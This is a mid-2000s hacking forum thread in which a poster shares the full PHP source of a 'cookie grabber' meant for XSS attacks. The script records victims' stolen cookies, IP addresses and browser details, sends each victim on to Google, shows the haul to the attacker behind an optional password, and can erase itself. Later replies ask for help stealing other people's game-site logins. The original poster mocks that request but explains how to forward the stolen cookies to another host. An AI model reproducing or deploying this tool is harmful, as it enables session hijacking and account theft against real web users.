UGN Security Forums
My ProfileMember DirectoryLogin
Search our ForumsView our FAQView our Site Rules
View our CalendarView our Active TopicsGo to our Main Page

UGN Security Store
 

Network Sites UGN Security, The GoNix Initiative, Elite Web Gamers, Back of the Web, EveryDay Helper, VNC Web Design & Development
September
Su M Tu W Th F Sa
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30
Sponsored Links
Latest Postings
The History Thread...
by Gremelin
09/18/14 12:42 PM
Doom 3
by Cyrez
09/11/14 11:58 PM
Latest Reviews
Page 1 of 2 1 2 >
Topic Options
Rate This Topic
#18904 - 09/23/05 03:23 AM Cookie Grabber
Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
I just realized that I never posted this. This is a cookie grabber for use with XSS vulnerabilities coded in PHP by me. It's simple yet powerful by allowing you to view the cookies through an XHTML interface. There are even login features if you choose to enable them.

Code:
<?php
//Ghost's Cookie grabber v2.0

/* Begin Config Section */

//Password to access stolen cookies
$ConfigPassword = 'example123';

//File to write, chmodded 666
$CookieFile = "example.txt";

//Cookie name, use a-z A-Z 0-9 _
$ConfigCookie = 'make_this_a_complicated_string_a';

//Flag to identify you as wanting to retrieve cookies
$GetCookiesStr = "getcookies";
//Usage: http://www.sitename.tld/path/script.php?getcookies

//Flag to identify you as wanting to delete script and data file
$DeleteStr = "delete";
//Usage: http://www.sitename.tld/path/script.php?delete

//Name of variable you want to recover and store the stolen cookie
$StolenCookieStr = "str";
//Usage: http://www.sitename.tld/path/script.php?str=

//Place to send browser once cookie has been obtained
$Redirect = "http://www.google.com";

/* End Config Section */

$Self = $_SERVER['PHP_SELF'];
$GetCookies = $_GET["$GetCookiesStr"];
$Delete = $_GET["$DeleteStr"];
$StolenCookie = $_GET["$StolenCookieStr"];
/* Un-comment functions below for login features */

/*
//Remove the Symbols above (slash and asterisk) to enable login features.
//Remember to scroll down and remove the other part of the comment as well.
function LoggedIn()
{

global $ConfigCookie;
$Cookie = $_COOKIE["$ConfigCookie"];
if(isset($Cookie)) {
  return true;
} else {
  return false;
}

}

function LogIn()
{
global $ConfigCookie;
setcookie("$ConfigCookie");
DisplayCookies();
}

function Authenticate()
{
$Pass = $_POST['pass'];
global $ConfigPassword;
global $Self;

if($Pass == $ConfigPassword) {
   LogIn();
} else {
   ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Login</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <form action="<?php $Self; ?>" method="post">
   <table border="1" cellspacing="1" cellpadding="1" rules="rows" align="center" width="50%">
    <tr><th>Password</th><td align="center"><input type="password" name="pass" size="25"/></td></tr>
    <tr><td align="center" colspan="2"><input type="submit" value="Login" /></td></tr>
   </table>
  </form>
</body>
</html>

<?php
}

}
//Remove The symbols below (slash and asterisk) to enable login features
*/

function DisplayCookies()
{
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Cookie Details</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <table border="1" cellspacing="1" cellpadding="1" rules="all" align="center" width="75%">
   <tr><th colspan="6">Cookie Details</th></tr>
   <tr><th><small>IP Address</small></th><th><small>User Agent</small></th>
   <th><small>Referer</small></th><th><small>Cookie Values</small></th></tr>
<?php
global $DeleteStr;
global $CookieFile;
$handle = fopen("$CookieFile", "a+");
$CookieFileContent = fread($handle, filesize("$CookieFile"));
$i = 0;
$CookieFileExploded = explode("\n", $CookieFileContent);
$NumCFE = count($CookieFileExploded) - 1;
while($i < $NumCFE) {
$j = $i + 1;
$k = $j + 1;
$l = $k + 1;
echo '<tr><td align="center"><small>' . "$CookieFileExploded[$i]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$j]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$k]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$l]"
. '</small></td></tr>' . "\n";
$i = $i + 4;
}
?>
  </table>
  


  <center><b><a href="<?php echo $Self; ?>?<?php echo $DeleteStr; ?>"><pre><font color="#000">Delete Script and Datafile</font></pre></a></b></center>
</body>
</html>
<?php
}


function SelfDestruct()
{
global $CookieFile;
$FSSelf = __FILE__;
if(file_exists($CookieFile)) {
unlink($CookieFile);
}
unlink($FSSelf);
}



function WriteCookies()
{
global $CookieFile;
global $StolenCookie;
global $Redirect;
global $Path;
$IP = $_SERVER['REMOTE_ADDR'];
$Browser = $_SERVER['HTTP_USER_AGENT'];
$Referer = $_SERVER['HTTP_REFERER'];
if($Browser == NULL) {
$Browser = "NULL";
}

if($Referer == NULL) {
$Referer = "NULL";
}

if($StolenCookie == NULL) {
$StolenCookie = "NULL";
}

$handle = fopen("$CookieFile", "a+");
$Content = "$IP" . "\n" . "$Browser" . "\n" . "$Referer" . "\n" . "$StolenCookie" . "\n";
if(is_writeable("$CookieFile")) {
$Write = fwrite($handle, "$Content");
}
header("Location: $Redirect");
fclose($handle);
}

if(function_exists('LoggedIn') && LoggedIn()) {

if(isset($Delete)) {
SelfDestruct();
die();
}

DisplayCookies();

} elseif(isset($GetCookies)) {

if(function_exists('Authenticate')) {

Authenticate();

} else {
DisplayCookies();
}

} elseif(isset($Delete)) {
SelfDestruct();
die();
} else {
WriteCookies();
}
?>
(Feature added)
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top
Sponsored Links
      
#18905 - 09/23/05 08:27 PM Re: Cookie Grabber
§intå× Offline


*****

Registered: 12/03/02
Posts: 3255
Loc: Maryland
can you set it to grab all cookies a user has grabbed?
_________________________
My New site OpenEyes

Top
#18906 - 09/23/05 11:29 PM Re: Cookie Grabber
Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
If you mean by exporting the grabbed cookies somewhere other than they were hosted, you could do that by having the script request another URL via fopen with the cookie variable stored in the URL.
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top
#18907 - 01/14/06 06:23 AM Re: Cookie Grabber
Spiky Offline
Junior Member

Registered: 01/14/06
Posts: 1
Loc: England
Could you tell me how to use it?

Top
#18908 - 01/14/06 06:00 PM Re: Cookie Grabber
Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
I answered that question in the PM you sent me.
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top
#18909 - 01/16/06 03:58 PM Re: Cookie Grabber
Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
Okay, people. I've been getting WAY too many private messages that could be resolved in this thread. If you have questions about this cookie grabber, or XSS in general, reply to this thread. If you need to, create a new thread, but DON'T private message me with that crap. I wont answer anything about this in a private message any longer. Private messages should be used to address things that can not be delt with in a public thread.
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top
#18910 - 01/16/06 05:18 PM Re: Cookie Grabber
nalwieno Offline
Junior Member

Registered: 01/16/06
Posts: 1
Loc: Hidden.
The code doesn't seem to function correctly in xanga. Is this code supposed to stand alone?

Top
#18911 - 01/16/06 06:35 PM Re: Cookie Grabber
Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
Yes.
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top
#18913 - 01/18/06 11:48 PM Re: Cookie Grabber
Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
You can't just 'steal' cookies. You have to exploit a browser that trusts javascript. Javascript combined with XSS (Cross site scripting) tecniques will allow you to steal cookies.

I'd suggest searching for information about XSS, cookies, javascript, and the HTTP protocol.
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top
#18915 - 01/19/06 05:58 PM Re: Cookie Grabber
Neokd101 Offline
Junior Member

Registered: 01/19/06
Posts: 4
Loc: Idaho
If you wanted to make it so that you coded this into a website and when someone visited it, it took their cookies what woul the code look like

Top
#18916 - 01/19/06 06:14 PM Re: Cookie Grabber
Neokd101 Offline
Junior Member

Registered: 01/19/06
Posts: 4
Loc: Idaho
and it sent the grabbe cookies to an email address

Top
#18917 - 01/19/06 07:56 PM Re: Cookie Grabber
Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
..and it stole their neopets password?

Quote:
Originally posted by Neokd101:
have you heard of neopets?? Well if i wanted to cookie grab someones password and username and have it sent to a email address. what would the script look like. so if i put it on a webpage and they visited the webpage it took their username and password and sent it to my emai
haha....
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top
#18918 - 01/20/06 11:15 AM Re: Cookie Grabber
Neokd101 Offline
Junior Member

Registered: 01/19/06
Posts: 4
Loc: Idaho
so can it be done

Top
#18919 - 01/20/06 04:30 PM Re: Cookie Grabber
Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
Yes it can be done, and I hope you don't expect a walk through.

If you want to know "If you wanted to make it so that you coded this into a website and when someone visited it, it took their cookies what and it sent the grabbe cookies to an email address woul the code look like", I suggest learning how to write PHP scripts or paying a professional to write it for you.

If you plan on utilizing such vulnerabilities, I expect you'll want to read about XSS, javascript, HTML, and the HTTP protocol.
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top
#18920 - 01/20/06 09:08 PM Re: Cookie Grabber
Neokd101 Offline
Junior Member

Registered: 01/19/06
Posts: 4
Loc: Idaho
there would be now way i could get you to do it for me?? I just was thinking that dont you have to tweak the code you posted above to get it to work.

Top
Page 1 of 2 1 2 >

Moderator:  §intå×, Gremelin 
Featured Member
Registered: 08/22/14
Posts: 1
Forum Stats
2148 Members
46 Forums
34725 Topics
69895 Posts

Max Online: 1567 @ 04/25/10 05:20 AM
Top Posters
UGN Security 27887
Gremelin 7193
§intå× 3255
SilentRage 1273
Ice 1146
pergesu 1136
Infinite 1041
jonconley 955
Girlie 908
unreal 860
Newest Members
Tim050, Gecko666, defghi795767, Devo60, ali
2148 Registered Users
Who's Online
0 registered (), 374 Guests and 247 Spiders online.
Key: Admin, Global Mod, Mod
Latest News


Donate
  Get Firefox!
Get FireFox!